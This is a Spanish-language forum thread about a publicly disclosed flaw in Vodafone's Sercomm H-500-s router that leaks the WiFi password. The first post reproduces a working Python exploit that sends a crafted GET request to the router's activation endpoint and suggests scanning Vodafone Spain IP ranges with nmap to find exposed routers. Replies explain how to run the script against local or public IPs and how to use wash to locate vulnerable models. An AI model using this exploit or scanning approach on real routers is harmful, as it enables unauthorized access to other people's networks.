El libre pensamiento para un internet libre
No estas registrado.
¿Papá Noel vodafone se pasó con la nieve de noche vieja?
No sabemos,
Lo que sabemos es que para empezar con alegría y fuerza este nuevo año; Daniel Monzón - aka stark0de - publicó un full disclosure el primer de enero.
Lo primero es saludar este esfuerzo: Personalmente no estaba en estado de publicar lo que sea aquel día.
Por lo visto Papá noel vodfaoine tampoco
La descripción de la brecha de seguridad es esta:
# The WiFi access point password gets disclosed just by performing a GET request with certain headers
Debemos poner ciertas cabeceras (ver justo abajo) en una petición GET hacía la interfaz (http://192.168.0.1/activation.htmlxxx) y la contraseña wifi cae.
Tenemos a un exploit escrito con python dónde podéis ver en detalles las dicha cabeceras
import requests
import sys
import json
if len(sys.argv) != 2:
print("Usage: python3 vodafone-pass-disclose.py http://IP")
sys.exit()
url = sys.argv[1]+"/data/activation.json"
cookies = {"pageid": "129"}
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
Firefox/78.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-
Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-
With": "XMLHttpRequest", "Connection": "close", "Referer":"http://192.168.0.1/activation.html?mode=basic&lang=en-es&step=129"}
Vodafone H-500-s 3.5.10 WiFi Password Disclosure
req=requests.get(url, headers=headers, cookies=cookies)
result=json.loads(req.text)[3].get("wifi_password")
print("[+] The wifi password is: "+result)
Se necesita acceso a la interfaz de configuración.
Y es justamente una especialidad de la casa, la marca del V: Vodafone tiene a bastante routers con el control remoto habilitado.
Hipotéticamente, si uno se pone en serio con nmap y este exploit en los rangos de IP Vodafone España, seguro que sacaría algo.
Este modelo se distribuye un poco por todos lados ya que tiene wifi ac y Gigabit, vale para fibra desde 100Mbps hasta 1Gps.
Según veo nos puede tocar con cualquier contrato "Vodafone One, fibra + SIM"
Y por ultimo, para descartar las fake news, sí que Papa Noel trabaja para Vodafone, por esto tiene un vestido rojo.
fuentes
Vodafone H-500-s 3.5.10 WiFi Password Disclosure by Daniel Monzon (aka stark0de) @ Packet Storm
Desconectado
Hola feliz año y bienvenido al foro xD
perdona te escribo a ver si me puedes aclarar unas dudas.
me gustaria preguntarte cual es el comando exacto para lanzar el exploit si puede ser,
se debe lanzar bajo python supongo lo digo por lo que veo en el codigo supongo que python3
creo que voy perdido no se tendria que lanzar contra un BSSID o un ESSID???
como seria desde consola,
tu lo has probado??
funciona?
y cuales son esas ciertas cabezeras?
suena a misterio como que ciertas?
las que salen en el codigo debajo de user agent y no hay que poner mas ni cambiar?
en Packet Storm nunca explican nada y el Daniel Monzon aka stark0de tampoco.
algun sitio con mas info sobre este exploit?
gracias por seguir en el foro desparecido y feliz año nuevo again y por muchos mas
Desconectado
¡Feliz año a ti también!
Y [email protected] @ wifi-libre
No he podido probar el exploit por falta de VFH500 a mano,
Tampoco he visto algo especial en estas "ciertas" cabeceras... He traducido certain por ciertas pero igualmente no es exactamente el mismo significado en inglés. Lo más llamativo es la huella "Referer" que apunta a la "activation.html", ahí está el agujero de seguridad ,
Tampoco he encontrado algo más detallado que en Packet Storm, En Packet Storm solo publican lo que les das, nunca comentan o explican, creo de hecho que Packet storm es un tío solo...
Por lo de ejecutar el script depende de la configuración de tu sistema .
De costumbre se puede hacer indicando el lenguaje seguido por la ruta del script.
python /ruta/script.py
Es posible que tengas que entrar python3 en lugar de python.
Si no te gusta puedes instalar el paquete «python-is-python3» (deb) o crear unos aliases.
[email protected]:~$ python
Orden «python» no encontrada. Quizá quiso decir:
la orden «python3» del paquete deb «python3»
la orden «python» del paquete deb «python-is-python3»
[email protected]:~$ python3
Python 3.8.10 (default, Nov 26 2021, 20:14:08)
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>>
Para poder ejecutar el script debes "tabular" el código, es mandatario en python,
Los headers deben estar en una sola linea y debes poner un tab en el primer print justo despuès la declaración de la condición if
De lo contrario tendrás errores "Indentation" y otro "End of Line".
No hace falta ni bSSID ni eSSID, no se necesita esta info.
Lo que se hace es devolverte en consola el resultado de la variable result
result=json.loads(req.text)[3].get("wifi_password")
Parece que se trata de pillar la cuarta coincidencia con la expresión regular "wifi password" y que está en formato *json,
O algo por el estilo...
Quizá se podría jugar con el indice o probar otras cosas y sacar más info útil.
Así que lo único que debes indicar es la IP (la del router) para mandar correctamente tu petición,
[email protected]:~$ python3 '/home/kcdtv/Escritorio/text.py'
Usage: python3 vodafone-pass-disclose.py http://IP
O sea algo así
python3 '/home/kcdtv/Escritorio/text.py' http://192.168.1.1
O bien pones la IP publica, debería funcionar también si está habilitado el acceso remoto.
Desconectado
Yo tampoco he encontrado ninguno
busque en wash con sercomm y con vodafone y vodafone parece que solo pone broadcom y algun realtek y por sercomm nada de nada y lo deje como media hora haciendo otras cosas pero nada,
con VFH500 no busque pero sera lo mismo supongo.
Para poder ejecutar el script debes tabular el código, es mandatario en python,
Los headers deben estar en una sola linea y debes tabular el primer print justo despuès la declaración de la condición if
De lo contrario tendrás errores "Identation" y otro "End of Line".No hace falta ni bSSID ni eSSID, no se necesita esta info.
Lo que se hace es devolverte en consola el resultado de la variable resultresult=json.loads(req.text)[3].get("wifi_password")
Parece que se trata de pillar la cuarta coincidencia con la expresión regular "wifi password" y que está en formato *json,
O algo por el estilo...
Quizá se podría jugar con el indice o probar otras cosas y sacar más info útil.
Aqui me pierdo completamente
yo no tabulo nada lo ejecuto y me dice lo de siempre:
"Usage: python3 vodafone-pass-disclose.py http://IP"
ningun error sobre "Identation" o "End of Line"
bueno esto se parece a Identation,
IndentationError: expected an indented block
es mas,
no se ni lo que significa tabular el codigo en python
ponerle tabulados al texto??
ya me callo
pero si apuntas a 192.168.1.1 desde tu maquina se supone que estas dentro de la red o sea se supone que ya tienes la clave,
eso no lo acabo de entender apuntar a 192.168.1.1 sin estar en una red
gracias por la ayuda.
Desconectado
con sercomm y con vodafone y vodafone parece que solo pone broadcom y algun realtek y por sercomm nada de nada
Sobre el manejo de wash:
Sercomm es el fabricante del router y Broadcom o Realtek son los fabricantes del chipset wifi.
Debes usar la opción -j para poder ver el fabricante del router, para ver los parámetros extendidos de las respuestas probes.
Es bueno combinar con -n 100, más lento pero más eficiente.
De memoria, he visto a routers Vodafone/Sercomm con chipset Realtek o Broadcomm en banda 2.4Ghz y Broadcom o Quantenna en banda 5Ghz.
Hay varios modelos...
Puedes también usar wash sin la opción -j, lo haces en pipe con grep y redactas tus expresiones regulares gracias a la tabla OUI. Pero así no tendrás el modelo.
bueno esto se parece a Identation,
IndentationError: expected an indented block
Indentación es efectivamente un anglicismo, según la RAE se debe decir el "sangrado" del código.
Pero creo que me voy a quedar con el anglicismo, la palabra es mucho más practica.
Puedes "indentar el código". En lugar de "hacer el sangrado del código". O hablar de un código "mal indentado"...
Por lo de usar <TAB> en lugar de los espacios para indentar los códigos, lo digo para tu futuro en la Sillicon Valley, es muuuuuuy importante.
pero si apuntas a 192.168.1.1 desde tu maquina se supone que estas dentro de la red o sea se supone que ya tienes la clave,
eso no lo acabo de entender apuntar a 192.168.1.1 sin estar en una red
Ahora entiendo lo de wash,... [email protected] hacen hacking ético y tú haces hacking cuántico ,,, Es cómo el Gato de Schrödinger: Estar en la red y no estar en la red al mismo tiempo.
Desconectado
si asi lo estaba haciendo
wash -i mon0 | grep vodafone -a
probare con -j a ver si veo algun VFH500
o sea la tabla oui solo vale para chipets
tabular el texto quiere decir poner tabulados en vez de espacio,
curioso...
quien hace caso a la RAE xD
perdido voy perdido vengo
si veo algo ya lo contare.
Desconectado
Por lo visto tenemos a 3 modelos Sercomm / vodafone:
Sercomm VFH500-S
Sercomm FG824CD
Sercomm VOX 2.5 avanzado DSL
En los tags extendidos de wash hay redes sercomm vodafone que sueltan
"wps_manufacturer" : "SERCOMM", "wps_model_name" : "Vodafone-H-500-s", "wps_model_number" : "Vodafone-H-500-s", "wps_device_name" : "Vodafone-H-500
Sale Vodafone-H-500-s y corresponde en los nombres en la versión del firmware que podemos ver en esta captura:
Esto serán los del modelo afectados,: Sercomm VFH500-S con firmware Vodafone-H-500-s
Por probar, lo he intentado en un Sercomm FG824CD, y a primera vista no tenemos a la misma brecha...
La versión del firmware es distinta cómo pueden ver
En sus probes no sale Sercomn o el modelo, solo salen los tags WPS de Ralink.
Sobre el ultimo modelo citado más arriba, sale el modelo en los parámetros extendidos de las respuestas Probes, son fáciles de identificar (y probablemente a descartar).
Añado el hilo twitter del autor del exploit,
Desconectado
Parecia mas facil al principio pero esta dificil,
esta dificil hasta probar todavia no localize ninguno,
gracias por la ayuda.
Desconectado
Por mi zona vodafone no está de moda. Veo más Orange o Másmovil y, la mayoría, Movistar. Dentro de las nueves redes vodafone que van apareciendo, muchas veces son de su sucursal "low cost" lowi,
He visto que "Daniel Monzón - aka stark0de" tiene una web: Stark0de
...Pero no la actualizó desde octubre 2020 y no hay nada sobre esta brecha de seguridad,
Aquí esta su github; stark0de
En los modelos sercom vodafone hay también este que debemos tener en cuenta:
Sercomm RHG3006
Es el más moderno con compatibilidad ax (wifi6)
No sé qué pinta tienen sus Probes, nunca lo he visto: Estos son todos los routers que instala Vodafone y sus características
Desconectado
Tema | Respuestas | Vistas | Ultimo mensaje |
---|---|---|---|
WPA por defecto de distintos routers por loader
|
5 | 527 | Ayer 22:58:16 por kcdtv |
Problema Extraño TP-Link CPE 610 por santyebou
|
3 | 2114 | Ayer 22:50:23 por kcdtv |
9 | 728 | Ayer 22:46:49 por kcdtv | |
Pegado: |
427 | 52490 | 04-08-2022 19:45:32 por disquette |
|
25 | 15797 | 03-08-2022 16:49:00 por javierbu |
Ultimo usuario registrado: ronnald
Usuarios registrados conectados: 0
Invitados conectados: 9
Número total de usuarios registrados: 2,334
Número total de temas: 1,593
Número total de mensajes: 15,197
Atom tema feed - Impulsado por FluxBB